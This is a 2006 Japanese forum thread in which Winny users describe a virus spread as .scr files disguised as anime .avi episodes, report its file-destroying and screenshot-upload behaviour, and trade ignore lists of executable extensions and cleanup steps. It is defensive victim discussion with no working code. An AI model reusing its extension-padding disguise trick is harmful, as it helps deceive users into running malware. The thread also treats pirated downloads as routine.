06/10/11 11:47:09 yTrGMZ93
さっきダウンした動画ファイルを起動したら実は
スクリーンセーバーになっていて、「うぐぅ」とか
言ってるアニメみたいな絵が出て、元々持っていたファイルが
壊された。新種のウイルスか?
2:肉茎平均
06/10/11 11:49:38 cSTtF11V
うぐぅウィルス
通称:ウグイス
3:名無しさん
06/10/11 12:28:08 k4QCVOL4
winnyでなにかに引っかかるとか
そういう初心者以下の奴はネットを辞めたらいいと思うよ
4:おちんちんプロパティー
06/10/11 12:37:04 bRUkDyxb
実はスクリーンセーバーだったぁぁぁぁ!!!!!!!
5:名無しさん
06/10/11 12:37:16 PHLecQuC
>>3
俺も感染する前はよくそう思ったもんだが、
油断して踏んでしまうことだってあるんだよ。
exeとかscrとか無視リストに入れておけばよかったんだが。
6:名無しさん
06/10/11 12:56:17 nKoUmVtD
ノートン先生は入れてないのか?
7:名無しさん
06/10/11 13:06:50 PHLecQuC
AVGは入れてあるんだけど、全く反応しなかった。
nyを使い始めて3~4年経つけど、こういうのは
初めてみた。アニメのデスノートの第02話のニセモノ
だったんだけど、容量が225MGとかで名前ももっとも
らしい名前だったからわからなかった。昔は無視リストを
登録して対策していたのだけど、最近は再インストか何かを
したためかリストを使っていなかった。。
8:お@きらわれもの。
06/10/11 13:11:39 6IaUGQ4Q
動画ファイルを起動したらスクリーンセーバーになった???
動画ファイルに埋め込まれてたって事?
そんな高度なの出来るの?
動画ファイルじゃなかったってオチじゃないよな?
9:名無しさん
06/10/11 13:14:37 PHLecQuC
ウイルス対策ソフトは反応しなかったけど、OSの
ファイアーウォールは警告が出た。
勿論ブロックしたけど。このウイルスはただファイルを
壊すだけじゃなくて、個人情報か何かも放流してしまう
タイプでもあるらしい。対策ソフトが反応しなかったと
いうことは新種だと思うから要注意だな。
10:名無しさん
06/10/11 13:16:57 PHLecQuC
>>8
当然、aviファイルとかに見せかけただけのscrファイルだけど。
aviの後ろにスペースを大量に入れて騙す初歩的なやつ。
「変化した」なんて書いてないだろ。
11:名無しさん
06/10/11 14:09:48 jZoY9JCM
落としたファイルはまず拡張子判別アプリ(WinExchangeとか)にかけろ
12:お
06/10/11 14:13:54 amnCu1nO
「変化した」なんてこっちも書いてないけど。
てか、初歩的な対策もしてない時点で
油断とかそういう次元じゃないじゃん。
そういう初心者以下の奴はネットを辞めたらいいと思うよ。
てか、ウィルスなのか、それ?
13:おちんちんプロパティ
06/10/11 14:14:15 bRUkDyxb
極窓はバージョンアップしなかったぁぁぁぁ!!!!!!
14:名無しさん
06/10/11 14:57:40 PHLecQuC
>>12
「実は○○だった」って言ってるのに>>8みたなレスってバカとしか思えない。
文章読めないのか。
ただのスクリーンセーバーならファイルを壊したりしないわけだし。。
15:名無しさん
06/10/11 15:04:26 PHLecQuC
>動画ファイルを起動したらスクリーンセーバーになった???
動画ファイルに埋め込まれてたって事?
>>1の文からこんな勘違いしているバカはお前だけだよ。
だいたい変に突っかかってきているようだけど、また人に
迷惑でもかけて疎外でもされたのかね?
16:名無しさん
06/10/11 15:09:54 PHLecQuC
>>7の「容量が225MG」は225MBだな。
17:名無しさん
06/10/11 15:19:02 PHLecQuC
>>11
無視条件に特定の拡張子を入れて、条件一致したファイルの
キーとかノードとかを出ないようにすればそこまでしなくてもいいはず。
18:名無しさん
06/10/11 15:22:05 PHLecQuC
>「変化した」なんてこっちも書いてないけど。
なんか、「動画ファイルを起動したらスクリーンセーバーになった???」
とか書いてるくせに「こっちも書いてないけど」って・・・
もう死んだ方がいいよ。
19:名無しさん
06/10/11 15:55:36 yPZAvONd
>>1が悪い
20:名無しさん
06/10/11 15:56:36 PsaKNv/G
ID:PHLecQuCっていつもの「IDコロコロ変えるな」キチガイ名無しか
21:名無しさん
06/10/11 15:58:37 naviSiYE
ロビイストどもはwinnyなんかやってんのかwwwwwwwwwww
犯罪者乙wwwwwwwwwwwwwwwwwwwwwwwwwwww
22:名無しさん
06/10/11 16:03:19 PsaKNv/G
wは半角じゃないぞ
23:名無しさん
06/10/11 16:05:11 naviSiYE
>>22
WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
こうですか!?わかりません!教えてください!
24:名無しさん
06/10/11 16:20:01 PHLecQuC
>>20
なんだそりゃ。
さすがにロビーだけあって妄想激しい奴がいるんだな。
25:名無しさん
06/10/11 16:23:22 PsaKNv/G
まあID:PHLecQuCが誰だろうと稚拙なことやっときながら逆ギレとかキモすぎだよな
26:1
06/10/11 16:37:39 8xcs40yh
>>25
その稚拙なことをやって逆ギレって、具体的には何のこと?
心当たり無いんですけど?
特に逆ギレしてるのっておじぞうって奴しかいないと思うんだけど。
27:名無しさん
06/10/11 17:33:57 BQ2yJsUU
IDコロコロ名無しっていつ寝てんだ
28:名無しさん
06/10/11 17:49:13 73zdq0ht
ここはドジふんだ馬鹿>>1を蔑むスレッドだよ
29:お@きらわれもの。
06/10/11 18:01:47 Pa/d5sjY
>>14
>>15
>>18
「スクリーンセーバーになった」
→「スクリーンセーバー画面になった」って書けば良かったか。
しかしそれを「変化した」などと読み違えたのはそっちじゃん?
「動画ファイルを起動したら」ってのがおかしいんじゃん?
「動画ファイルじゃなかった」ってことじゃん?
「動画ファイルを起動したと思ったら」じゃん?
「実はスクリーンセーバーだった」で伝わるじゃん?
こっちも言葉が足りなかったとは思うが
どっちもお互い様じゃん?
それに3レスもかけて異常なまでに過剰反応するのってどうよ?
つーか、対策の話にはなにも反論しないのな。
まあ実際やってなかったのが馬鹿過ぎたのは
自分でもわかってるんだろうけど
こっちにそんなキレられてもな。
八つ当たりもいいとこ。
30:名無しさん
06/10/11 18:04:11 PsaKNv/G
>そういう初心者以下の奴はネットを辞めたらいいと思うよ。
この一言でネチネチ逆恨みしてるんだろうな
31:名無しさん
06/10/11 18:14:32 WVj7YqVj
>>29
自分の読解力の無さに自覚が無いとは驚きだ。
結局、言ってることがよく分からなくて>>8みたいな
間抜けなレスができたわけだろ。。お前のレスは最初から
ズレてるわけ。対策の話に反論しないっていうのも
意味不明だな。どうすればいいのか最初から自分で
分かっていることなんだし。ちゃんと読まないからそういう
ことになるんだろ。レスが多くなるのはそれだけお前の話には
突っ込みどころが多いということ。つか、マジで八つ当たりでもなんでも
ないんだが、最初から的外れなこと言ったり言い方がオカシイと
思ったんだけど。元々頭悪い奴だとは思ってたが、今日はさらに悪く見える。。
32:名無しさん
06/10/11 18:20:18 WVj7YqVj
どの辺で勘違いしたのか見当はついていたけど、やっぱり
「動画ファイルを起動したら」の所か。バカ丁寧に言わなくても
普通の読解力があれば文脈で分かると思うのだけど。
33:名無しさん
06/10/11 18:27:20 WVj7YqVj
「さっきダウンした動画ファイルを起動したら実は
スクリーンセーバーになっていて」と言っているんだから
これを普通、動画ファイルにスクリーンセーバーが埋め込まれていた
なんてことに解釈するやつ普通いないよなあ。
34:お@きらわれもの。
06/10/11 18:29:07 Pa/d5sjY
俺も知識ないからよく知らないけど
ファイル埋め込み型とかたまーに聞くのよ。
あるんだかないんだかよ^わからんかったのだけど
>>1見て「やっぱりあるのか」と思いこんだわけよ。
>>31-33
これも1回にまとめて書けばいいんじゃないの?
興奮してるの?即レスしたくてたまらんの?
>>14>>15>>18って内容ほぼ同じじゃない?
あ、「ほぼ」だからね?
違うって言うだろうから書いておくけど。
「ほぼ」ね?「ほぼ」って意味はわかるよね?
あと文脈とか言いだしちゃうとな。
こっちも同じ返し方できちゃうわけなんだけど。
>>8見て「変化した」って読み方はないだろ、ってなっちゃうよ?
その後の文で「埋め込まれてたのか?」つってるんだから。
てか、ツッコミどころ多すぎだなキミは。
35:お@きらわれもの。
06/10/11 18:33:15 Pa/d5sjY
ツッコミどころ多いから2レスになっちゃったよ。
対策の話云々は分かっているから、ということは
>>29でいいんでしょ?
自分の馬鹿さ加減を分かってるから。同意してくれたのね。
どうすればいいのか分かっていたのにやらなかった=馬鹿ってことだよね?
まさか「わかっていたんだから馬鹿じゃないもん!」って話じゃないよね?
>>12は対策方法を知らなかったんだろって話じゃないし。文脈で分かるよね?
36:ビデオ勃起 ◆vHsBoKkI5I
06/10/11 18:33:25 VggTBBry
話が変な方向に言ってるな。
脳がウィルスにやられたのか。
37:名無しさん
06/10/11 18:42:31 0SdjeFpm
いちいち宣伝すんなよ>>1
38:名無しさん
06/10/11 18:46:01 WVj7YqVj
最初に勘違いして的外れなことを言ってきたのが自分で
あることを棚に上げてそっちがどうだ、ああだと。。
こいつはアレだ、まともな話できないしガキの屁理屈だし
天邪鬼だしオウム返しだよ。
自虐調か煽り調でしかレスできないみたいだし。
まともなやり取りにならないわ。ほんの少しでも建設的、有意義な
カイワニナラナイ。
相手にしてもキリがないし、不毛すぎる。
勿論、最初から不毛なのは分かっての遊び的なものではあったけど
ここまでアレなやつだとは思わなかったよ。つか、コミュニケーション
能力が絶望的に欠如しているとか言ってたことあったが、リアルでも
そんな感じなら哀れに思うよ。じゃあな。もうレスしない。
「反論できないな。俺が正しい」とか勝手に思っちゃってて。
39:名無しさん
06/10/11 18:54:14 /ygG30Lb
>aviの後ろにスペースを大量に入れて騙す初歩的なやつ。
こんなのに引っかかるのは情けないと言うかアホだな
40:名無しさん
06/10/11 18:55:24 fP9mkjRq
メディアプレイヤーのアイコンになってて巧妙なのがあるよ
41:名無しさん
06/10/11 19:01:07 /ygG30Lb
アイコンが変わっててもだよ
「登録されている拡張子は表示しない」のチェックを外しとけばそんなの引っかからん
42:お@きらわれもの。
06/10/11 19:01:30 Pa/d5sjY
>>38
>>1の時点で言葉が足りなかったのが最初じゃねぇの?
それを棚に上げてるとは言わないの?
文脈で押し通すの?
同じことをこっちがいうと屁理屈になるの?
オウム返しされるのは自分が棚に上げてるのを指摘されてるんだと思えないの?
>>39
落とす時と落とした後の2回気づかなかったって事だもんなぁ。
>>40
アイコンで見ないでしょ。
そもそもフォルダアイコン偽装があんちにー流行の第一歩だったわけだし。
43:肉茎平均
06/10/11 20:56:36 cSTtF11V
だからウグイスだって
44:名無しさん
06/10/11 21:03:24 jpQ+B1XE
ほぉ~
45:へぼらやす菜 ◆oywuHEBORA
06/10/11 21:57:40 KAbbs+SB
おじと名無しのやりとりは、「どっちが言葉が足りていなかったか」 ってことより、
「ちょっと言葉が足りていない程度のことで延々突っかかる」 ことの方が、傍目に
かなりアレって感じよ。
46:名無しさん
06/10/11 21:58:55 AjpHXdzX
アレ
47:名無しさん
06/10/11 22:12:28 eobIDlsT
アレアレ詐欺?
48:へぼらやす菜 ◆oywuHEBORA
06/10/11 22:16:22 KAbbs+SB
アーレー アーレー
ノダケンサンバー♪
アレ!
49:三十路童貞
06/10/11 22:34:51 bt1SHdez
ひえだのアレ
50:残りもの人生 ◆JnidJSJ.Uw
06/10/11 22:39:32 FEfjcK5t
町娘まわるアレアレアー
51:名無しさん
06/10/12 14:02:36 CT0lBqWH
かなりレア
52:名無しさん
06/10/17 10:19:49 LMDCZxIZ
起動したら目の離れたお姫様が出てきた。
ウイルスか?
53:名無しさん
06/10/17 16:07:46 eb5QfZh2
拡張子がaviのウィルスもあるから気をつけた方がいいよ。
例を挙げるとデスノの映画でそれが出回ってる。
54:名無しさん
06/10/17 16:30:33 EelApz/j
これってどういう症状になるんだろ。ほかのキンタマと同じかね?
とりあえずC:\UGuu-X103-0なんつーフォルダが作成されて、
クリックした瞬間のデスクトップ画像が入ってたん
速攻で回線抜いてマカフィーでも警告が出たからブロックして、
その時間に作成されたファイルも削除して復元もしたから大丈夫だとは思うんだが…
過去のキンタマ関連の駆除方法も一通り試したし。
ちなみにおとボク第二話のaviファイルで騙されたんだぜ?
「.avi .scr」
55:名無しさん
06/10/17 16:49:19 Sf5twGEj
そんな心配なら、いい機会と思って再インストールしたらいいんでないかな。
56:Miyakomoerer ◆MG64yE6TCE
06/10/17 17:12:30 Se14sQcN
> おとボク第二話・
あいしゅうをさそう
57:名無しさん
06/10/17 18:22:38 y7qp7Va3
ダウン板からきますた
1週間ぐらい前に出回ってきた新種のウイルスみたいだね
お@きらわれもの。と>>53はネタですか?
58:名無しさん
06/10/17 18:26:45 q/xcs7fh
またおじぞう粘着か
59:名無しさん
06/10/17 21:07:13 qlbhffOh
どうせこれだろ?
*.scr .exeを踏んで大騒ぎしてるだけだろ。
電波ちゃん大騒ぎだな。
60:名無しさん
06/10/17 21:26:40 Gc4kwevR
>>59だけだと思うだろ?
61:名無しさん
06/10/18 00:19:48 3u0PrBvi
.scr,,0,0,,0,1,0
.com,,0,0,,0,1,0
.bat,,0,0,,0,1,0
.cmd,,0,0,,0,1,0
.pif,,0,0,,0,1,0
.exe,,0,0,,0,1,0
これぐらい無視いれとけよ
62:肉茎平均
06/10/18 00:29:32 AAWuCKER
数字の意味は何?
63:名無しさん
06/10/18 00:42:41 zK4Wu27O
>>62
無視条件で初めの2つがファイルの上限下限後の3つが0か1かではいかいいえ
64:肉茎平均
06/10/18 01:13:38 AAWuCKER
上限下限で0,0だと全てのファイルって事になるの?
65:名無しさん
06/10/18 03:41:46 ZtyftP+3
/ / / ./〃 ! \丶 `ヽ 、 `、
/ / / / / / :/{ │ ヽヽ \ \
. / / :/ / / / イ│ | l l \ l
; / , / / ,' / / │l | | | i ハヘ |
| / / :! l | { /jレ│ | |l 、| l | | | l | l
|/| /l | | |__,厶斗匕l ! | l ヽ l`ー‐-j_ハ. ___/ j j │ ∧
| / | | l lヽ { .ァ≠ミヘ { ヽ \ _ッ、/ ミ、 / // l ∧
レ -ヘ lヽ ヽ l Vl 圦_ハ `代_ノ l}∨| /∧ :| | __, -‐'⌒l
. / ヽ l \{\!ー《.{fj::::::: ! ifj::::::: リ 》 !/ハノ :| .|-‐'´ /
l N {ヘハヽ弋辷ソ ///// 弋辷;ソ /イ '´ | li │ /
. / / ハ と=-‐' ' ー-=つ i| ト、 ! / うぐぅ
ヽ / l /! l ヘ ~~ォ'´  ̄`ヽ、/ /i| | l | _/、
/^l Ⅳ ! |. lヽ、 〃 ヽ`ヽ /ll | / ∨-一''´ }
{. リ∨ .jハ i\ > 、 ___/ \} /リ / `ヽ /
\ 〈 \ l\\/\ ! Y / / | /
\f  ̄\ \_ヽ_\l\_ヽ_{ l`Y__/ -‐─イ_/
( 〉 \/ `ヽヘ ∧ レ ヘ / / )
Y \/ Vハヘ //ヽ∧ l /
} 〃 }}∨ヽ` ー / ヽ/ ∧ / ̄
/ /{{ /ハ!メ_\__/\./ヽ/ 〉 〉
66:名無しさん
06/10/18 04:07:58 WnTiv8Wp
>>1
どうせあれだろ
○○.avi .scr
こんな感じのを踏んだんだろ?ばかじゃねーのw
だいたい名前長すぎて分からなかったにしろ、変換した後ファイルのアイコンで気付くだろ。
もう初心者乙としかいいようがない。
67:名無しさん
06/10/18 07:13:25 kxva/l7o
>>66
いや、アイコンもWindows Mediaファイルに偽装されてるんだよ
まぁ、詳細表示にしてれば「スクリーンセーバー」って出てるから普通は間違えないんだけどな…
でもクリックしちゃったんだよね。
68:名無しさん
06/10/18 07:20:39 WnTiv8Wp
>>67
だったらデスクトップに変換するとか。
デスクトップなら今試したけど、長いタイトルは「...」になる。んでワンクリックしたら全文でる。
69:名無しさん
06/10/18 07:45:27 h/PhvLOB
回覧,,0,0,,0,1,0
INCOMP,,0,0,,0,1,0
黑,,0,0,,0,1,0
HD外,,0,0,,0,1,0
実験用,,0,0,,0,1,0
html,,0,0,,0,1,0
交換のみ,,0,0,,0,1,0
.scr,,0,0,,0,1,0
.exe,,0,0,,0,1,0
.cmd,,0,0,,0,1,0
.bat,,0,0,,0,1,0
.pif,,0,0,,0,1,0
.com,,0,0,,0,1,0
.lnk,,0,0,,0,1,0
.url,,0,0,,0,1,0
.folder,,0,0,,0,1,0
.hml,,0,0,,0,1,0
.vbs,,0,0,,0,1,0
inacheve,,0,0,,0,1,0
incomplete,,0,0,,0,1,0
70:名無しさん
06/10/18 07:46:47 h/PhvLOB
コンパネ
↓
管理ツール
↓
ローカル セキュリティ ポリシー
↓
ソフトウェア制限のポリシー
↓
追加の法則
↓右栗
新しいパスの規則
DLフォルダのパスを指定して、セキュリティレベルは許可しない
71:名無しさん
06/10/19 14:36:19 WsC2rRIa
うぐぅ
72:名無しさん
06/10/19 15:10:47 kq863Smd
あぐぅ
73:名無しさん
06/10/20 03:00:38 Yw2yFaQ/
ためしに適当なPCにいれて実行したら
そのファイルと同じフォルダにはいってるファイルやサブフォルダ内のファイルを
順次「元のファイル名+ .exe .exe .exe」みたいな
数百キロのファイルに書き換えるみたいだな。
ついでにWMPぶっこわれた。再インストールすれば問題なさそうだけど。
他なんか被害・影響あるのかな。
74:名無しさん
06/10/20 11:39:06 1x2zjbE4
うちのは真っ先にIEとOEぶち壊されましたよ。
75:名無しさん
06/10/20 23:02:49 J8BlzzjO
PCが爆発しました
76:名無しさん
06/10/21 00:05:39 S6OKpCke
>>75
あ、うそはだめぽ
77:名無しさん
06/10/21 04:12:00 OnsC8T60
これは原田の亜種かな?
78:名無しさん
06/10/21 16:11:28 S6OKpCke
うぐぅウィルスの感染画像くださいw
79:名無しさん
06/10/21 22:02:31 ypiVmrfp BE:50523252-BRZ(2883)
_ _
〃┏━ 、
| ノノソハ))) / ̄ ̄ ̄ ̄
Λ_リリ*´ワ`)リ < うぐぅ♪age
( ⊂#~ ∞~~#⊃ \____
( つ/_∞__|~
|(__)_)
(__)_)
80:名無しさん
06/10/22 14:11:20 s3vODnL8
俺はこれに感染してもプログラム関係は無傷だった。
同じうぐぅでも色々種類があるのか?
81:名無しさん
06/10/22 14:40:00 xnYRjyie
無傷だったと思ってるだけなんじゃないの?
82:名無しさん
06/10/22 15:12:57 s3vODnL8
そういう関係のダメージ受けた人は、実行ファイルを消されている
わけなんだよ。だから消されていなければ問題ないでしょ。
症状が原田ウイルスに似ているから、そのウイルスの症状を
見れば特徴が分かる。
83:名無しさん
06/10/22 15:15:24 LDJh7ESu
なにこのスレ?
84:名無しさん
06/10/22 15:16:58 +RgeHXkr
女コテに粘着してるような頭のカラッポのやつはこの程度の仕掛けにまんまと引っかかるってことだろ
85:名無しさん
06/10/25 16:37:48 8l6PrQTj
ああタイヤキウイルスの事ね
86:名無しさん
06/10/25 16:59:27 /WD7AoPd
他スレでこのウィルスの事教えてもらいました。
自分のは「早くおでん買ってきなさい!~~」ってヤツでした。
亜種になるのかな?これも。
とりあえず動画ファイルのほとんどをペイントに変えられました。
変えられたものは全て削除しましたが・・これで処置はいいんでしょうかね?
キンタマみたいにデータが外部に出るような事はないんでしょうか?
87:名無しさん
06/10/25 19:19:09 MpMJra2J
ウイルスうp
88:名無しさん
06/10/25 21:28:59 qaVmWmC3
というかお前らsageろ
89:名無しさん
06/10/26 08:24:56 NaJpLd2f
lzhは危険度で言ったらzipくらいのもんじゃね?
90:名無しさん
06/10/26 08:49:20 U6o0TuTK
ネギま3話でやられちゃった♪
・・・・・・・ぐむぅ。
91:名無しさん
06/10/26 10:05:25 k2egN2AT
俺も拡張子aviでうぐぅウィルスに引っかかった。
アイコン見た限りaviだったからスッカリ騙された。
展開したディレクトリのファイルが次々に.exeファイルに書き換えられていってる最中、
直ぐシャットダウンしたから、その後のどんな活動するか不明。
aviウィルスってのかな。これは、うぐぅにあらず
URLリンク(seals.jpn.ph)
pass:nyui
92:名無しさん
06/10/26 16:20:08 E9hqGHc7
うぐぅウイルスは感染するとまずnyのdownフォルダ内の全てのファイルを
例の画像ファイルに書き換え、C直下にUGuuというフォルダが作られる。
そのフォルダ内にはウイルスらしきexe(確かアイコンが○の中に は の文字だった)
と、感染直後のデスクトップのスクリーンショットと、何かのアニメの
画像が入っている。この後ftpでこのスクリーンショットをupしようとするようだ。
firewallでブロックできるようだが。
さらに、システムの復元のためのフォルダ
C:\System Volume Information\_restore\ に自身のコピーを置く。
多分、wmpとかのexeファイル等が無事なのであればこのシステムの復元ファイル
とUguuフォルダを消せば完全に駆除したことになる。
93:名無しさん
06/10/26 18:39:07 k2egN2AT
>>92
俺のは亜種だったみたい。
c直下には "UGuuL" と "UPFILE" いうフォルダがあったよ。
"UGuuL" の中には SETUP.exe , Readme.jpeg , DDT.bmpが作られてました。
bmpはニュイルス起動時に撮られたSSで、Readme.jpegは案の定うぐぅ画像でした。
URLリンク(www.imgup.org)
感染するとコイツが画面に広がります。
また "UPFILE" の中には、デスクトップに置いていた.txt,.xls,.doc およびWinnyの設定情報(未確認)が
コピーされており、恐らくこれらを特定のFTPにうpると思われます。
さらにイベントビューアでログを探ってみた所、
OutlookやIE等の.dllを何らかのファイルに置き換えようとしていたのが分かりますた。
あと諸々のアプリケーションを削除するような動きもするみたいです。
あと、C:\System Volume Information\_restore\ に該当する本体を探しているんですが、
起動した時間で検索してもTEMPフォルダにいくつか残骸がある程度で、それらしいのが出てこないですね。
94:名無しさん
06/10/26 21:41:11 rkTlBrPF
こっちでまた別のにひっかかった。
c直下にkamomというフォルダ、中身は
感染直後に出てきた「タコウインナー食べる?」のカノンキャラの画像PSS.bmpと、
感染後のデスクトップ画像Readme.jpg
95:名無しさん
06/10/26 23:08:25 rkTlBrPF
ちなみにほっておいたらほとんどのavi,exeファイルが消された。
HDD半分ふっとんだZE!
96:名無しさん
06/10/26 23:23:03 k2egN2AT
>>95
次回起動時から、どこかにFTP接続されると思われ。
引っかかった時間に更新作製されたファイルを調べて、原因と切り分けてみて。
97:名無しさん
06/10/26 23:58:47 rkTlBrPF
>>96
あーごめん、ほとんど消えちったんで初期化作業はじめちゃった。
ちなみにイベントビューアで確認した感染ファイルは
BLACK LAGOON ブラックラグーン 第13話「Guerrillas in The Jungle」 (1280×720 DivX5.21 120fps).avi\[UPX]" file.
ってアレ?
落としたのは16話だったはずなんだが俺アホス
98:名無しさん
06/10/27 04:31:56 UHttC7Cq
これの亜種に数日前引っかかった。
感染ファイルはおとボク第3話。
起動したらあゆの「たいやき買ってこないとファイル消しちゃうよ~w」の画像。
すぐ再起動したら、downフォルダの動画が2つほど拡張子が.scrになってた。
それとc直下にAYUAYUAYUフォルダ、中身はPSS.bmpと感染後のデスクトップ画像Readme.jpg
99:名無しさん
06/10/27 04:37:02 ar3Ivjzi
[映画](洋画) ブラック・ダリア (ブライアン・デ・パルマ監督 121m15s DivX5.11 日本語字幕 by アナル男爵).avi .SCR
俺はこれでやられた。
100:名無しさん
06/10/27 08:39:54 pAZET6dG
自分も引っかかった。
アニメのデスノートの3話か4話で。
ny入れてるHDの半分以上の動画がbmpに変えられたよ。
ディスクトップの画像をシークで晒されたのかな。
とりあえずアカウントは消したけど・・
ディスクトップ画像の他に情報が流出したりしてないかかなり不安・・・。
101:名無しさん
06/10/27 11:22:51 3+vYw+a9
シングル系のファイルに多くね?
102:名無しさん
06/10/27 11:39:18 OTPnqOn7
拡張子aviのウイルス出来たの?
判別方法は今のところないの?
103:名無しさん
06/10/27 11:57:07 GeM4fGIf
拡張子 aviのウィルスなんてwindowsの仕様上作れないよ
104:名無しさん
06/10/27 12:29:06 OTPnqOn7
なんだ
じゃあ拡張子偽装も見抜けない馬鹿が引っかかってるだけか
安心した
105:肉茎平均
06/10/27 12:44:51 xT1acLj/
誰かshareの使い方教えてちょんまげ
106:名無しさん
06/10/28 06:36:37 ed5H84Mj
windowsはフォルダの設定で実行ファイルの拒否ができます。
落としたファイルはそこにいれて開けば大丈夫。
107:名無しさん
06/10/28 16:00:40 e/rJVuZZ
>>106それでもヲタは感染するw
108:名無しさん
06/10/29 04:59:23 +uYpyKYc
なんか亜種が多くね?
漏れは感染後 VB2006で C:\を検索した結果、
C:\Uguu-X105内で TROJ_HARADONG.AO に
感染した SETUP.EXEが発見されました。
正式ファイル名:Kanon-117-1000.exe
著作権:谷口悟郎
109:名無しさん
06/10/29 14:36:55 0bHf1HB8
>>106
OS標準機能ではそんなのないよね?
ZoneID3とかいうフリーウェア見つけたから
藻前らこれでも入れて監視しとけ。
URLリンク(www.forest.impress.co.jp)
110:名無しさん
06/10/29 23:59:22 M+C8EfRo
(アニメ) 乙女はお姉さまに恋してる 第04話 「開かずの扉の眠り姫」 (D-CTC 704x396 DivX622 120fps 不定期).avi
.SCR
243,628,490 178b4c74bd9bd7caedc86dc4928bc123
今のところ、C直下にUguuフォルダが作られたことしか確認できていません。
詳細お願いします。
111:名無しさん
06/10/30 21:10:44 IZdYMt63
俺はギャラクシーエンジェる~んだったな。ちなみにSCRな。
早めにシャットダウンしたつもりだったが、多少被害が出た。
今まで確認したもの↓
・nyのdownフォルダ内の動画が画像に。
・wmvが壊された(他にもあるかも・・・)。
・Cの下に「Uguu-XP」フォルダ(中身はスクショとタイヤキ画像)。
112:名無しさん
06/10/31 00:03:19 a+DcblJ8
>>110
うぐぅウィルスは亜種が多すぎるからなんとも言えない
とりあえずそのC直下フォルダ消せばさほど問題はなし
Downフォルダの動画が画像になったり壊されたりしなかった?
113:sage
06/10/31 00:44:05 8apPxawQ
>>112
Downフォルダの動画がbmp画像に変わっちゃってました・・。
Downフォルダの中に別にフォルダーを作って保管していたファイルは
無事だったんだけど・・・。
とりあえず画像になっちゃったファイルだけ削除したんだけど
やっぱりリカバリーする必要ありますか?
114:sage
06/10/31 00:54:32 8apPxawQ
私のはCの下に「MAKOPI」ってフォルダが出来てて、
中身は(早くおでん買ってきなさいよ!アンタのPCがどうなっても知らないよ)
とかいうアニメ絵の画像と、自分のDownフォルダー内に有ったファイル名がbmp画像になって写ってました・・。
これってただ問題のフォルダーを削除するだけじゃあ解決にならないんでしょうか?
115:sage
06/10/31 00:57:21 8apPxawQ
>114
それって はぅ~ぅ って書いてねえ?
116:ウンコの王様
06/10/31 01:04:37 TgKKnopX
人
(__)
( ・∀・)ひどい自作自演を見た
117:名無しさん
06/10/31 03:11:16 a+DcblJ8
あまりにも酷い自演だがスルーせずに書いてみよう
>>112に書いたとおり亜種がやたら多い
何か毎日毎日増えてる気がする
共通する部分は
・nyのdownフォルダ内の動画が破壊(exeも?)
・C直下にフォルダ作成(名前は亜種によって様々、私はAYUAYUAYUだった)
・フォルダの中身はデスクトップ画像とKanonの画像(亜種によっては+exe?)
種類によっては他のプログラムも破壊する
対処は>>92>>93を参考に
118:名無しさん
06/11/01 03:03:32 QPZuYokk
C:\System Volume Information
↑を開こうとすると拒否されるんですがどうしたらいいですか?
119:名無しさん
06/11/01 03:11:14 SSgR9mY6
>>118
復元ポイントのファイルがある。
復元ポイントを無効か削除してみな
120:名無しさん
06/11/01 21:56:30 vLI7qAYX
ここに書き込みしてる時点でWINNY使用者ってことやん。
犯罪者じゃん。
121:名無しさん
06/11/02 19:07:19 cLqLTrJW
>>120
wwwwwwww
122:名無しさん
06/11/02 21:00:12 0idt/0bf
ウィルス作った奴も犯罪者ってことだなww
123:名無しさん
06/11/02 21:09:51 KesOIC8M
感染者が犯罪者~w
作者は悪くな~いw
124:名無しさん
06/11/03 01:40:56 /og6j8gY
システムの復元をしたからかどうかわからないが
削除したSCRファイルが復活してたよwwww
125:名無しさん
06/11/03 12:17:20 MFUgiXp1
126:名無しさん
06/11/03 13:11:05 3sD1HTKw
釣なのかしらんが、Winnyの使用自体は何の違法性も無い。
127:名無しさん
06/11/03 13:49:31 mzL9Sevo
感染者は著作権侵害をするほどの違法者w
こんな奴らを世の中が助けてど~するww
128:名無しさん
06/11/03 18:20:30 Y5KfLSgY
何度読んでも>>80>>82は、俺のツボを刺激する件
129:名無しさん
06/11/03 19:20:40 Ne10jvrI
>>70
それXPProじゃないと
130:名無しさん
06/11/03 21:56:53 9nXxgRa1
[アニメ] デスノート-DEATH NOTE- 第05話 「駆引」 (D-NTV 704x396 DivX640 120fps).avi .SCR
同じフォルダ内のファイルの拡張子をbmpに変えて、サイズを901KBにして壊す。
program files内のEXEを消す
ノートン反応せず。
131:肉茎平均
06/11/03 21:58:54 UoGUy/Nz
なんでwinny使ってるの?
132:残りもの人生 ◆JnidJSJ.Uw
06/11/03 22:01:46 KyFSDoSu
お金がないからだ
133:肉茎平均
06/11/03 22:03:42 UoGUy/Nz
いや、そういう問題ではなくて洒落は使わないの?
134:名無しさん
06/11/03 22:05:25 9nXxgRa1
洒落は使わない
135:名無しさん
06/11/03 22:07:29 p26VxrmB
漢はnyしか使わないと言う人も多いからね
136:残りもの人生 ◆JnidJSJ.Uw
06/11/03 22:07:39 KyFSDoSu
覚えるのがめんどうだもん
137:肉茎平均
06/11/03 22:08:43 UoGUy/Nz
そうなんだ
138:食用ウミケムシ
06/11/03 22:14:30 50X9Xuab
ふと思ったんだけどさ、ウィニーって言ってしまえば集団万引きだよね。
誰か一人が万引きしたのをさ、みんなでまわしあってんだから。
そういう連中が万引きの文句言っちゃうのは無しだよね。
139:残りもの人生 ◆JnidJSJ.Uw
06/11/03 22:20:24 KyFSDoSu
だからまっとうな人間はウィニーなんてやらんのです
ウィニーやってるヤツはみんなクズですよ
140:食用ウミケムシ
06/11/03 22:22:44 50X9Xuab
じゃあ、クズの連中は万引き容認で有り、あびる優だかって万引きアイドルを擁護したりする連中ってことでOKなんだよね。
するってーと、ネットの中は真っ当な連中ばっかりってことで仮想空間ですよね。
141:食用ウミケムシ
06/11/03 22:25:23 50X9Xuab
なんか日本語おかしいな。素晴らしい仮想空間ですよねって書いたつもりなのに。
142:名無しさん
06/11/04 00:51:31 H+8JL2pM
なんか川澄舞のやつにやられた。
C直下にMAIってフォルダ、これってうぐぅの亜種?
143:名無しさん
06/11/04 14:54:14 3kr9VHnc
>>130
同ファイル&同症状に陥ったよ。
Program files内全滅に限りなく近い。
とほほ。。。
現在OSクリーンインスト中。。。
144:名無しさん
06/11/04 17:06:45 E2XBxg/Z
藻前ら、まだやられてるのかよ。。。
145:名無しさん
06/11/04 17:11:01 E2XBxg/Z
>>128
感染しても早いうちに再起動すれば被害は少なくて済むらしい。
146:名無しさん
06/11/04 19:08:59 qJsoa/vZ
program filesほとんどやられた人は感染したときに
